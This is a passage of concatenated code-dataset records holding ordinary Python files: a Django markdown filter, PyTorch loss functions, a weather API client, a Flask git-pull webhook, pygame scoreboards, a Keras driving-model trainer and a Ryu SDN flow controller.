conn.engine.execute(ins)\n","sub_path":"schools3/data/base/schools_table.py","file_name":"schools_table.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"654433995","text":"import bleach\nimport markdown\nfrom django import template\nfrom ..models import HeroGuide\n\nregister = template.Library()\n\nALLOWED_TAGS = [\n 'a',\n 'abbr',\n 'acronym',\n 'b',\n 'blockquote',\n 'code',\n 'em',\n 'h1',\n 'h2',\n 'h3',\n 'h4',\n 'h5',\n 'h6',\n 'i',\n 'li',\n 'ol',\n 'p',\n 'pre',\n 'strong',\n 'table',\n 'td',\n 'th',\n 'tr',\n 'ul',\n]\n\n\n@register.filter\ndef markdownify(text):\n untrusted_text = markdown.markdown(text)\n html = bleach.clean(untrusted_text, tags=ALLOWED_TAGS)\n html = bleach.linkify(html)\n return html\n\n\n@register.inclusion_tag('core/include/hero_guides_by_user.html', takes_context=True)\ndef hero_guides_by_user(context, object):\n request = context['request']\n hero_guides = HeroGuide.objects.filter(author=object.user)\n\n return {\n 'request': request,\n 'hero_guides': hero_guides,\n }\n\n\n@register.simple_tag(name='hero_guides_count_user')\ndef hero_guides_count_user(object):\n return HeroGuide.objects.filter(author=object.user).count()\n","sub_path":"overwatch/core/templatetags/posts_tag.py","file_name":"posts_tag.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"361411651","text":"import torch\nfrom torch.autograd import Variable\nfrom torch.autograd import Function\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets, transforms\nfrom functools import partial\nimport numpy as np\nimport torch.nn as nn\nimport pdb\nfrom itertools import combinations\nimport torch.nn.functional as F\nclass ReverseLayerF(Function):\n\n @staticmethod\n def forward(ctx, x, p):\n ctx.p = p\n\n return x.view_as(x)\n\n @staticmethod\n def backward(ctx, grad_output):\n output = grad_output.neg() * ctx.p\n\n return output, None\n\ndef pairwise_distance(x, y):\n\n if not len(x.shape) == len(y.shape) == 2:\n raise ValueError('Both inputs should be matrices.')\n\n if x.shape[1] != y.shape[1]:\n raise ValueError('The number of features should be the same.')\n\n x = x.view(x.shape[0], x.shape[1], 1)\n y = torch.transpose(y, 0, 1)\n output = torch.sum((x - y) ** 2, 1)\n output = torch.transpose(output, 0, 1)\n\n return output\n\ndef gaussian_kernel_matrix(x, y, sigmas):\n\n sigmas = sigmas.view(sigmas.shape[0], 1)\n beta = 1. / (2. * sigmas)\n dist = pairwise_distance(x, y).contiguous()\n dist_ = dist.view(1, -1)\n s = torch.matmul(beta, dist_)\n\n return torch.sum(torch.exp(-s), 0).view_as(dist)\n\ndef maximum_mean_discrepancy(x, y, kernel= gaussian_kernel_matrix):\n\n cost = torch.mean(kernel(x, x))\n cost += torch.mean(kernel(y, y))\n cost -= 2 * torch.mean(kernel(x, y))\n\n return cost\n\ndef mmd_loss(source_features, target_features):\n\n sigmas = [\n 1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 5, 10, 15, 20, 25, 30, 35, 100,\n 1e3, 1e4, 1e5, 1e6\n ]\n if params.use_gpu:\n gaussian_kernel = partial(\n gaussian_kernel_matrix, sigmas = Variable(torch.cuda.FloatTensor(sigmas))\n )\n else:\n gaussian_kernel = partial(\n gaussian_kernel_matrix, sigmas = Variable(torch.FloatTensor(sigmas))\n )\n loss_value = maximum_mean_discrepancy(source_features, target_features, kernel= gaussian_kernel)\n loss_value = loss_value\n\n return loss_value\n\ndef triplet_loss(features, labels):\n #model.train()\n #emb = model(batch[\"X\"].cuda())\n #y = batch[\"y\"].cuda()\n #pdb.set_trace() \n\n #with torch.no_grad():\n triplets = get_triplets(features, labels)\n f_A = features[triplets[:, 0].cuda()]\n f_P = features[triplets[:, 1].cuda()]\n f_N = features[triplets[:, 2].cuda()]\n\n ap_D = (f_A - f_P).pow(2).sum(1) # .pow(.5)\n an_D = (f_A - f_N).pow(2).sum(1) # .pow(.5)\n losses = F.relu(ap_D - an_D + 1.)\n\n return losses.mean()\n\n\ndef center_loss(tgt_model, batch, src_model, src_centers, tgt_centers, \n src_kmeans, tgt_kmeans, margin=1):\n # triplets = self.triplet_selector.get_triplets(embeddings, target, embeddings_adv=embeddings_adv)\n # triplets = triplets.cuda()\n\n\n #f_N = embeddings_adv[triplets[:, 2]]\n\n f_N_clf = tgt_model.convnet(batch[\"X\"].cuda()).view(batch[\"X\"].shape[0], -1)\n f_N = tgt_model.fc(f_N_clf.detach())\n \n #est.predict(f_N.cpu().numpy())\n y_src = src_kmeans.predict(f_N.detach().cpu().numpy())\n #ap_distances = (emb_centers[None] - f_N[:,None]).pow(2).min(1)[0].sum(1)\n ap_distances = (src_centers[y_src] - f_N).pow(2).sum(1)\n #ap_distances = (f_C[None] - f_N[:,None]).pow(2).sum(1).sum(1)\n\n \n #an_distances = 0\n losses = ap_distances.mean()\n\n # y_tgt = tgt_kmeans.predict(f_N.detach().cpu().numpy())\n # ap_distances = (tgt_centers[y_tgt] - f_N).pow(2).max(1)[0]\n\n # losses += ap_distances.mean()*0.1\n\n # f_P = src_model(batch[\"X\"].cuda())\n #an_distances = (f_P - f_N).pow(2).sum(1)\n #losses -= an_distances.mean() * 0.1\n \n return losses\n\n\n\n### Triplets Utils\n\ndef extract_embeddings(model, dataloader):\n model.eval()\n n_samples = dataloader.batch_size * len(dataloader)\n embeddings = np.zeros((n_samples, model.n_outputs))\n labels = np.zeros(n_samples)\n k = 0\n\n for images, target in dataloader:\n with torch.no_grad():\n images = images.cuda() \n embeddings[k:k+len(images)] = model.get_embedding(images).data.cpu().numpy()\n labels[k:k+len(images)] = target.numpy()\n k += len(images)\n\n return embeddings, labels\n \ndef get_triplets(embeddings, y):\n\n margin = 1\n D = pdist(embeddings)\n D = D.cpu()\n\n y = y.cpu().data.numpy().ravel()\n trip = []\n\n for label in set(y):\n label_mask = (y == label)\n label_indices = np.where(label_mask)[0]\n if len(label_indices) < 2:\n continue\n neg_ind = np.where(np.logical_not(label_mask))[0]\n \n ap = list(combinations(label_indices, 2)) # All anchor-positive pairs\n ap = np.array(ap)\n\n ap_D = D[ap[:, 0], ap[:, 1]]\n \n # # GET HARD NEGATIVE\n # if np.random.rand() < 0.5:\n # trip += get_neg_hard(neg_ind, hardest_negative,\n # D, ap, ap_D, margin)\n # else:\n trip += get_neg_hard(neg_ind, hardest_negative,\n D, ap, ap_D, margin)\n\n if len(trip) == 0:\n ap = ap[0]\n trip.append([ap[0], ap[1], neg_ind[0]])\n\n trip = np.array(trip)\n\n return torch.LongTensor(trip)\n\n\n\n\ndef pdist(vectors):\n D = -2 * vectors.mm(torch.t(vectors)) \n D += vectors.pow(2).sum(dim=1).view(1, -1) \n D += vectors.pow(2).sum(dim=1).view(-1, 1)\n\n return D\n\n\ndef get_neg_hard(neg_ind, \n select_func,\n D, ap, ap_D, margin):\n trip = []\n\n for ap_i, ap_di in zip(ap, ap_D):\n loss_values = (ap_di - \n D[torch.LongTensor(np.array([ap_i[0]])), \n torch.LongTensor(neg_ind)] + margin)\n\n loss_values = loss_values.data.cpu().numpy()\n neg_hard = select_func(loss_values)\n\n if neg_hard is not None:\n neg_hard = neg_ind[neg_hard]\n trip.append([ap_i[0], ap_i[1], neg_hard])\n\n return trip\n\ndef random_neg(loss_values):\n neg_hards = np.where(loss_values > 0)[0]\n return np.random.choice(neg_hards) if len(neg_hards) > 0 else None\n\ndef hardest_negative(loss_values):\n hard_negative = np.argmax(loss_values)\n return hard_negative if loss_values[hard_negative] > 0 else None\n\ndef semihard_negative(loss_values, margin=1):\n semihard_negatives = np.where(np.logical_and(loss_values < margin, loss_values > 0))[0]\n return np.random.choice(semihard_negatives) if len(semihard_negatives) > 0 else None\n\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"601979161","text":"import requests\nimport datetime\n\nfrom config import Config\n\n\ndef call_api_by_id(city_id, api_id):\n weather = {'city_id': city_id, 'date': datetime.datetime.now()}\n res = requests.get(\"http://api.openweathermap.org/data/2.5/weather\",\n params={'id': api_id, 'units': 'metric', 'lang': 'ru', 'APPID': Config.APIKEY})\n data = res.json()\n if data['cod'] == 401:\n return -1\n weather['temp'], weather['weather'], weather['pressure'] = data['main']['temp'], data['weather'][0]['main'], \\\n data['main']['pressure']\n return weather\n","sub_path":"app/weather_api.py","file_name":"weather_api.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631213992","text":"## Fibonacci numbers using Bottom up DP\n\ndef Fib(n):\n fib = [0]*10000\n fib[0] = 1\n fib[1] = 1\n for i in range(2,n+1):\n fib[i] = fib[i-1]+fib[i-2]\n \n return fib[n]\n\nif __name__ == \"__main__\":\n print(Fib(250))","sub_path":"DS ALGO/Dynamic Programming/Fibonacci numbers using botoom up Dp.py","file_name":"Fibonacci numbers using botoom up Dp.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"8827965","text":"from flask import Flask\nimport os\nimport sys\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef hook():\n os.system('git pull')\n return 'hello world!'\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=int(sys.argv[1]))\n","sub_path":"static/hook.py","file_name":"hook.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314220628","text":"import pygame.font\r\n\r\nclass Scoreboard():\r\n def __init__(self, ai_settings, screen, stats):\r\n self.screen = screen\r\n self.ai_settings = ai_settings\r\n self.stats = stats\r\n\r\n self.text_color = (0, 0, 0)\r\n self.font = pygame.font.SysFont(None, 48)\r\n\r\n self.prep_score()\r\n\r\n def prep_score(self):\r\n score_str = str(self.stats.step)\r\n self.score_image = self.font.render(score_str, True, self.text_color)\r\n\r\n def show_score(self):\r\n self.screen.blit(self.score_image, (780, 245))\r\n\r\nclass Timeboard():\r\n def __init__(self, ai_settings, screen, stats):\r\n self.screen = screen\r\n self.ai_settings = ai_settings\r\n self.stats = stats\r\n\r\n self.text_color = (0, 0, 0)\r\n self.font = pygame.font.SysFont(None, 48)\r\n\r\n self.prep_time()\r\n\r\n def prep_time(self):\r\n time_str = str(self.stats.time) + 's'\r\n self.time_image = self.font.render(time_str, True, self.text_color)\r\n\r\n def show_time(self):\r\n self.screen.blit(self.time_image, (780, 390))\r\n\r\nclass Showboard():\r\n def __init__(self, ai_settings, screen, stats, msg, x, y, size, color):\r\n self.screen = screen\r\n self.ai_settings = ai_settings\r\n self.stats = stats\r\n\r\n self.text = msg\r\n self.text_color = color\r\n self.font = pygame.font.SysFont('方正粗黑宋简体', size)\r\n self.rect = screen.get_rect()\r\n self.x = x\r\n self.y = y\r\n\r\n self.prep_msg()\r\n\r\n def prep_msg(self):\r\n self.msg_image = self.font.render(self.text, True, self.text_color)\r\n self.msg_image_rect = self.msg_image.get_rect()\r\n self.msg_image_rect.center = (self.x, self.y)\r\n\r\n def show_msg(self):\r\n self.screen.blit(self.msg_image, self.msg_image_rect)","sub_path":"原型实现/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"158518748","text":"import csv\nimport cv2\nimport numpy as np\nimport sklearn\nimport sklearn.utils\nimport pandas as pd\n\nH5_FILE = \"model_{0}.h5\" # where to store the trained model\nCSV_FILE = \"model_{0}.csv\" # where to store training and test validation performance\nAUG_FACTOR = 6 # augmentation factor by which to multiply each data point / image in order to get correct batch size\nMODEL = \"nvidia\" # pipeline to be used for training\n\n# generator function to get batch of data\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n sklearn.utils.shuffle(samples)\n # take number of samples into current batch\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n measurements = []\n for batch_sample in batch_samples:\n # also take left and right images\n for source_path_column, measurement_correction in zip([0, 1, 2], [0.0, 0.1, -0.1]):\n source_path = batch_sample[source_path_column]\n filename = source_path.split(\"/\")[-1]\n current_path = 'data/IMG/' + filename\n image = cv2.imread(current_path)\n # correct for odd cv2 BGR representation\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n images.append(image)\n measurement = float(batch_sample[3])\n measurements.append(measurement + measurement_correction)\n # data augmentation by flipping axis horizontally\n augmented_images, augmented_measurements = [], []\n for image, measurement in zip(images, measurements):\n augmented_images.append(image)\n augmented_measurements.append(measurement)\n augmented_images.append(cv2.flip(image, 1))\n augmented_measurements.append(measurement*-1.0)\n X_train = np.array(augmented_images)\n y_train = np.array(augmented_measurements)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# retrieving all data from CSV except the first line (header)\nsamples = []\nwith open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n skipline = True\n for line in reader:\n if skipline == True:\n skipline = False\n else:\n samples.append(line)\n\n# train-test split with test size 20%\nfrom sklearn.model_selection import train_test_split\ntrain_samples, validation_samples = train_test_split(samples, test_size=0.2)\n\n# compile and train the model using the generator function\ntrain_generator = generator(train_samples, batch_size=32)\nvalidation_generator = generator(validation_samples, batch_size=32)\n\n# model definition and training\n\nfrom keras.models import Sequential\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Dropout, ELU\n\n# first layers normalize data and crop the lane segments at the bottom\nmodel = Sequential()\nmodel.add(Lambda(lambda x: x/255.0-0.5, input_shape=(160,320,3)))\nmodel.add(Cropping2D(cropping=((70,25), (0,0))))\nhistory = None\n\nif MODEL == \"nvidia\":\n # NVidia pipeline\n model.add(Convolution2D(24,5,5,subsample=(2,2),activation=\"relu\"))\n model.add(Convolution2D(36,5,5,subsample=(2,2),activation=\"relu\"))\n model.add(Convolution2D(48,5,5,subsample=(2,2),activation=\"relu\"))\n model.add(Convolution2D(64,3,3,activation=\"relu\"))\n model.add(Convolution2D(64,3,3,activation=\"relu\"))\n model.add(Flatten())\n model.add(Dense(100))\n model.add(Dense(50))\n model.add(Dense(10))\n model.add(Dense(1))\n model.compile(loss='mse', optimizer='adam')\n history = model.fit_generator(train_generator, validation_data=validation_generator,\n samples_per_epoch=len(train_samples)*AUG_FACTOR, nb_val_samples=len(validation_samples)*AUG_FACTOR,\n nb_epoch=5)\nelif MODEL == \"commaai\":\n # Comma.ai model\n model.add(Convolution2D(16,8,8,subsample=(4,4),border_mode=\"same\",activation=\"elu\"))\n model.add(Convolution2D(32,5,5,subsample=(2,2),border_mode=\"same\",activation=\"elu\"))\n model.add(Convolution2D(64,5,5,subsample=(2,2),border_mode=\"same\",activation=\"elu\"))\n model.add(Flatten())\n model.add(Dropout(.2))\n model.add(ELU())\n model.add(Dense(512))\n model.add(Dropout(.5))\n model.add(ELU())\n model.add(Dense(1))\n model.compile(loss='mse', optimizer='adam')\n history = model.fit_generator(train_generator, validation_data=validation_generator,\n samples_per_epoch=len(train_samples)*AUG_FACTOR, nb_val_samples=len(validation_samples)*AUG_FACTOR,\n nb_epoch=5)\n\n# save trained model\nmodel.save(H5_FILE.format(MODEL))\n# save history data / train-validation performance\nhistory_dict = {'loss': history.history['loss'], 'val_loss': history.history['val_loss']}\npd.DataFrame(data=history_dict).to_csv(CSV_FILE.format(MODEL), index_label='epoch')\n","sub_path":"clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"153902465","text":"import logging\n\nfrom ryu import cfg\nfrom ryu.lib import dpid as dpid_lib\nfrom ryu.ofproto import ether\nfrom ryu.ofproto import inet\n\nfrom daolicontroller import exception\nfrom daolicontroller import utils\nfrom daolicontroller.lib.base import PacketBase\nfrom daolicontroller.lib.constants import CONNECTED, DISCONNECTED\n\nCONF = cfg.CONF\nLOG = logging.getLogger(__name__)\n\nINFILTER = [2375]\nOUTFILTER = [4001]\n\n\nclass PacketIPv4(PacketBase):\n priority = 1\n\n def _redirect(self, dp, inport, outport, **kwargs):\n kwargs['eth_type'] = ether.ETH_TYPE_IP\n super(PacketIPv4, self)._redirect(dp, inport, outport, **kwargs)\n\n def init_flow(self, dp, gateway):\n int_port = self.port_get(dp, gateway['IntDev'])\n if not int_port:\n return False\n\n # Add flow where is from local host.\n self._redirect(dp, dp.ofproto.OFPP_LOCAL, int_port.port_no,\n ipv4_src=gateway['IntIP'])\n\n # Add icmp flow coming from outer.\n self._redirect(dp, int_port.port_no, dp.ofproto.OFPP_LOCAL,\n ip_proto=inet.IPPROTO_ICMP, ipv4_dst=gateway['IntIP'])\n\n # Add initial port flow. eg: docker socket port, etcd port.\n for port in INFILTER:\n self._redirect(dp, int_port.port_no, dp.ofproto.OFPP_LOCAL,\n ip_proto=inet.IPPROTO_TCP, ipv4_dst=gateway['IntIP'],\n tcp_dst=port)\n\n for port in OUTFILTER:\n self._redirect(dp, int_port.port_no, dp.ofproto.OFPP_LOCAL,\n ip_proto=inet.IPPROTO_TCP, ipv4_dst=gateway['IntIP'],\n tcp_src=port)\n\n def filter(self, src, dst):\n peer = \"%s:%s\" % (src['Id'], dst['Id'])\n try:\n action = self.client.policy(peer)\n if action == CONNECTED:\n return True\n elif action == DISCONNECTED:\n return False\n except Exception:\n return False\n\n if src['NetworkName'] != dst['NetworkName']:\n # returns if group exists src and dst network\n if not self.client.group(src['NetworkName'], dst['NetworkName']):\n return False\n\n return True\n\n def _firewall(self, msg, dp, in_port, pkt_ether, pkt_ipv4, pkt_tp, fw, gateway):\n ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n\n container = self.get(fw['Container'])\n if not container:\n raise exception.ContainerNotFound(container=fw['Container'])\n\n if pkt_ipv4.proto == inet.IPPROTO_TCP:\n input_key = ofp_set(tcp_dst=fw['ServicePort'])\n output_key = ofp_set(tcp_src=pkt_tp.dst_port)\n input_kwargs = {\n 'tcp_src': pkt_tp.src_port,\n 'tcp_dst': pkt_tp.dst_port,\n }\n output_kwargs = {\n 'tcp_src': fw['ServicePort'],\n 'tcp_dst': pkt_tp.src_port,\n }\n rinput_kwargs = {\n 'tcp_src': pkt_tp.src_port,\n 'tcp_dst': fw['ServicePort'],\n }\n else:\n input_key = ofp_set(udp_dst=fw['ServicePort'])\n output_key = ofp_set(udp_src=pkt_tp.dst_port)\n input_kwargs = {\n 'udp_src': pkt_tp.src_port,\n 'udp_dst': pkt_tp.dst_port,\n }\n output_kwargs = {\n 'udp_src': fw['ServicePort'],\n 'udp_dst': pkt_tp.src_port,\n }\n rinput_kwargs = {\n 'udp_src': pkt_tp.src_port,\n 'udp_dst': fw['ServicePort'],\n }\n\n input_match = ofp_parser.OFPMatch(\n in_port=in_port,\n eth_type=ether.ETH_TYPE_IP,\n ip_proto=pkt_ipv4.proto,\n ipv4_src=pkt_ipv4.src,\n ipv4_dst=pkt_ipv4.dst,\n **input_kwargs)\n\n output_actions = [\n ofp_set(eth_src=pkt_ether.dst),\n ofp_set(eth_dst=pkt_ether.src),\n ofp_set(ipv4_src=pkt_ipv4.dst),\n ofp_set(ipv4_dst=pkt_ipv4.src)]\n\n output_actions.append(output_key)\n output_actions.append(ofp_out(in_port))\n\n if gateway['DatapathID'] != container['DataPath']:\n cgateway = self.gateway_get(container['DataPath'])\n rdp = self.ryuapp.dps[dpid_lib.str_to_dpid(container['DataPath'])]\n rofp, rofp_parser, rofp_set, rofp_out = self.ofp_get(rdp)\n\n gwport = self.port_get(rdp, id=container['NetworkId'])\n cport = self.port_get(rdp, id=container['EndpointID'])\n if not cport or not gwport:\n raise exception.DevicePortNotFound()\n\n liport = self.port_get(rdp, gateway['IntDev'])\n riport = self.port_get(rdp, cgateway['IntDev'])\n\n input_actions = [\n ofp_set(eth_src=gateway['IntDev']),\n ofp_set(eth_dst=cgateway['IntDev']),\n ofp_set(ipv4_dst=container['VIPAddress'])]\n\n input_actions.append(input_key)\n input_actions.append(ofp_out(liport))\n\n output_match = ofp_parser.OFPMatch(\n in_port=liport.port_no,\n eth_type=ether.ETH_TYPE_IP,\n ip_proto=pkt_ipv4.proto,\n ipv4_src=container['VIPAddress'],\n ipv4_dst=pkt_ipv4.src,\n **output_kwargs)\n\n remote_input_match = rofp_parser.OFPMatch(\n in_port=riport.port_no,\n eth_type=ether.ETH_TYPE_IP,\n ip_proto=pkt_ipv4.proto,\n ipv4_src=pkt_ipv4.src,\n ipv4_dst=container['VIPAddress'],\n **rinput_kwargs)\n\n remote_input_actions = [\n rofp_set(eth_src=gwport.hw_addr),\n rofp_set(eth_dst=container['MacAddress']),\n rofp_set(ipv4_dst=container['IPAddress'])]\n\n remote_input_actions.append(rofp_out(cport.port_no))\n\n remote_output_match = rofp_parser.OFPMatch(\n in_port=cport.port_no,\n eth_type=ether.ETH_TYPE_IP,\n ip_proto=pkt_ipv4.proto,\n ipv4_src=container['IPAddress'],\n ipv4_dst=pkt_ipv4.src,\n **output_kwargs)\n\n remote_optput_actions = [\n rofp_set(eth_src=cgateway['IntDev']),\n rofp_set(eth_dst=gateway['IntDev']),\n rofp_set(ipv4_src=container['VIPAddress'])]\n\n input_actions.append(ofp_out(riport.port_no))\n\n self.add_flow(rdp, remote_output_match, remote_output_actions)\n self.add_flow(rdp, remote_input_match, remote_input_actions)\n self.packet_out(msg, dp, remote_input_actions)\n else:\n gwport = self.port_get(dp, id=container['NetworkId'])\n cport = self.port_get(dp, id=container['EndpointID'])\n if not cport or not gwport:\n raise exception.DevicePortNotFound()\n\n input_actions = [\n ofp_set(eth_src=gwport.hw_addr),\n ofp_set(eth_dst=container['MacAddress']),\n ofp_set(ipv4_dst=container['IPAddress'])]\n\n input_actions.append(input_key)\n input_actions.append(ofp_out(cport.port_no))\n\n output_match = ofp_parser.OFPMatch(\n in_port=cport.port_no,\n eth_type=ether.ETH_TYPE_IP,\n ip_proto=pkt_ipv4.proto,\n ipv4_src=container['IPAddress'],\n ipv4_dst=pkt_ipv4.src,\n **output_kwargs)\n\n self.add_flow(dp, output_match, output_actions)\n self.add_flow(dp, input_match, input_actions)\n self.packet_out(msg, dp, input_actions)\n\n def firewall(self, msg, dp, in_port, pkt_ether, pkt_ipv4, pkt_tp, gateway):\n ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n\n port = self.port_get(dp, gateway['IntDev'])\n if not port:\n raise exception.DevicePortNotFound()\n\n if in_port == port.port_no or in_port == ofp.OFPP_LOCAL:\n if pkt_ipv4.proto == inet.IPPROTO_ICMP:\n return True\n\n if in_port == ofp.OFPP_LOCAL:\n outport = port.port_no\n else:\n outport = ofp.OFPP_LOCAL\n\n fw = self.client.firewall(gateway['DatapathID'], pkt_tp.dst_port)\n if fw:\n self._firewall(msg, dp, in_port, pkt_ether, pkt_ipv4, pkt_tp, fw, gateway)\n else:\n kwargs = {\n 'ipv4_src': pkt_ipv4.src,\n 'ipv4_dst': pkt_ipv4.dst,\n 'timeout': CONF.timeout}\n if pkt_ipv4.proto == inet.IPPROTO_TCP:\n kwargs['tcp_src'] = pkt_tp.src_port\n kwargs['tcp_dst'] = pkt_tp.dst_port\n else:\n kwargs['udp_src'] = pkt_tp.src_port\n kwargs['udp_dst'] = pkt_tp.dst_port\n\n actions = [ofp_parser.OFPActionOutput(outport)]\n self._redirect(dp, in_port, outport, ip_proto=pkt_ipv4.proto, **kwargs)\n self.packet_out(msg, dp, actions)\n return True\n\n return False\n\n def run(self, msg, pkt_ether, pkt_ipv4, pkt_tp, gateway, **kwargs):\n dp = msg.datapath\n in_port = msg.match['in_port']\n\n try:\n ret = self.firewall(msg, dp, in_port, pkt_ether,\n pkt_ipv4, pkt_tp, gateway)\n if ret:\n return True\n except Exception:\n return False\n\n src = self.get(pkt_ether.src)\n if not src:\n return False\n\n dst = self.get(pkt_ipv4.dst)\n if not dst:\n self.public_flow(msg, dp, pkt_ether, pkt_ipv4, in_port, src)\n return True\n\n if not self.filter(src, dst):\n return False\n\n snode, dnode = src.get('Node'), dst.get('Node')\n if not snode or not dnode:\n snode = dnode = utils.gethostname()\n\n # the same node\n if snode == dnode:\n dst_port = self.port_get(dp, id=dst['EndpointID'])\n if not dst_port:\n return False\n\n ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n\n if pkt_ether.dst != dst['MacAddress']:\n submac = pkt_ether.dst\n else:\n submac = None\n\n def local_flow(smac, dmac, sip, dip, iport, oport):\n match = ofp_parser.OFPMatch(\n in_port=iport,\n eth_type=ether.ETH_TYPE_IP,\n eth_src=smac,\n ipv4_src=sip,\n ipv4_dst=dip)\n actions = ([ofp_set(eth_src=submac)]\n if submac is not None else [])\n actions.extend([ofp_set(eth_dst=dmac), ofp_out(oport)])\n self.add_flow(dp, match, actions)\n\n return actions\n\n local_flow(dst['MacAddress'], src['MacAddress'],\n pkt_ipv4.dst, pkt_ipv4.src,\n dst_port.port_no, in_port)\n self.packet_out(msg, dp, local_flow(\n src['MacAddress'], dst['MacAddress'],\n pkt_ipv4.src, pkt_ipv4.dst,\n in_port, dst_port.port_no))\n else:\n if not dst.get('DataPath'):\n LOG.info(\"target ovs could not be registered.\")\n return False\n\n self.host_flow(msg, dp, in_port, pkt_ether, pkt_ipv4, gateway, src, dst)\n\n def host_flow(self, msg, dp, in_port, pkt_ether, pkt_ipv4, src_gateway, src, dst):\n ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n liport = self.port_get(dp, src_gateway['IntDev'])\n\n rdp = self.ryuapp.dps[dpid_lib.str_to_dpid(dst['DataPath'])]\n\n dst_port = self.port_get(rdp, id=dst['EndpointID'])\n if not dst_port:\n return\n\n dst_gateway = self.gateway_get(dst['DataPath'])\n rofp, rofp_parser, rofp_set, rofp_out = self.ofp_get(rdp)\n riport = self.port_get(rdp, dst_gateway['IntDev'])\n\n output_local_match = ofp_parser.OFPMatch(\n in_port=in_port,\n eth_type=ether.ETH_TYPE_IP,\n eth_src=pkt_ether.src,\n ipv4_src=pkt_ipv4.src,\n ipv4_dst=pkt_ipv4.dst)\n\n output_local_actions = [\n ofp_set(eth_src=liport.hw_addr),\n ofp_set(eth_dst=riport.hw_addr),\n ofp_set(ipv4_src=src['VIPAddress']),\n ofp_set(ipv4_dst=dst['VIPAddress']),\n ofp_out(liport.port_no),\n ]\n\n input_remote_match = rofp_parser.OFPMatch(\n in_port=riport.port_no,\n eth_type=ether.ETH_TYPE_IP,\n eth_dst=riport.hw_addr,\n #ipv4_src=pkt_ipv4.src,\n #ipv4_dst=pkt_ipv4.dst)\n ipv4_src=src['VIPAddress'],\n ipv4_dst=dst['VIPAddress'])\n\n if pkt_ether.dst == dst['MacAddress']:\n dst_srcmac = pkt_ether.src\n else:\n gwport = self.port_get(rdp, id=dst['NetworkId'])\n dst_srcmac = gwport.hw_addr\n\n input_remote_actions = [\n rofp_set(eth_src=dst_srcmac),\n rofp_set(eth_dst=dst['MacAddress']),\n rofp_set(ipv4_src=pkt_ipv4.src),\n rofp_set(ipv4_dst=pkt_ipv4.dst),\n rofp_out(dst_port.port_no)]\n\n output_remote_match = rofp_parser.OFPMatch(\n in_port=dst_port.port_no,\n eth_type=ether.ETH_TYPE_IP,\n eth_src=dst['MacAddress'],\n ipv4_src=pkt_ipv4.dst,\n ipv4_dst=pkt_ipv4.src)\n\n output_remote_actions = [\n rofp_set(eth_src=riport.hw_addr),\n rofp_set(eth_dst=liport.hw_addr),\n rofp_set(ipv4_src=dst['VIPAddress']),\n rofp_set(ipv4_dst=src['VIPAddress']),\n ofp_out(riport.port_no),\n ]\n\n input_local_match = ofp_parser.OFPMatch(\n in_port=liport.port_no,\n eth_type=ether.ETH_TYPE_IP,\n eth_dst=liport.hw_addr,\n #ipv4_src=pkt_ipv4.dst,\n #ipv4_dst=pkt_ipv4.src)\n ipv4_src=dst['VIPAddress'],\n ipv4_dst=src['VIPAddress'])\n\n input_local_actions = [\n ofp_set(eth_src=pkt_ether.dst),\n ofp_set(eth_dst=pkt_ether.src),\n ofp_set(ipv4_src=pkt_ipv4.dst),\n ofp_set(ipv4_dst=pkt_ipv4.src),\n ofp_out(in_port),\n ]\n\n self.add_flow(rdp, input_remote_match, input_remote_actions)\n self.add_flow(rdp, output_remote_match, output_remote_actions)\n self.add_flow(dp, input_local_match, input_local_actions)\n self.add_flow(dp, output_local_match, output_local_actions)\n self.packet_out(msg, dp, output_local_actions)\n\n def public_flow(self, msg, dp, pkt_ether, pkt_ipv4, in_port, src):\n ofp, ofp_parser, ofp_set, ofp_out = self.ofp_get(dp)\n gwport = self.port_get(dp, id=src['NetworkId'])\n if not gwport:\n return\n\n output_match = ofp_parser.OFPMatch(\n in_port=in_port,\n eth_type=ether.ETH_TYPE_IP,\n eth_src=pkt_ether.src,\n ipv4_src=pkt_ipv4.src,\n ipv4_dst=pkt_ipv4.dst)\n\n output_actions = [ofp_out(gwport.port_no)]\n\n input_match = ofp_parser.OFPMatch(\n in_port=gwport.port_no,\n eth_type=ether.ETH_TYPE_IP,\n eth_src=gwport.hw_addr,\n ipv4_src=pkt_ipv4.dst,\n ipv4_dst=pkt_ipv4.src)\n\n input_actions = [\n ofp_set(eth_dst=pkt_ether.src),\n ofp_out(in_port),\n ]\n\n self.add_flow(dp, input_match, input_actions)\n self.add_flow(dp, output_match, output_actions)\n self.packet_out(msg, dp, output_actions)\n\n def flow_delete(self, sid, did):\n src = self.get(sid)\n dst = 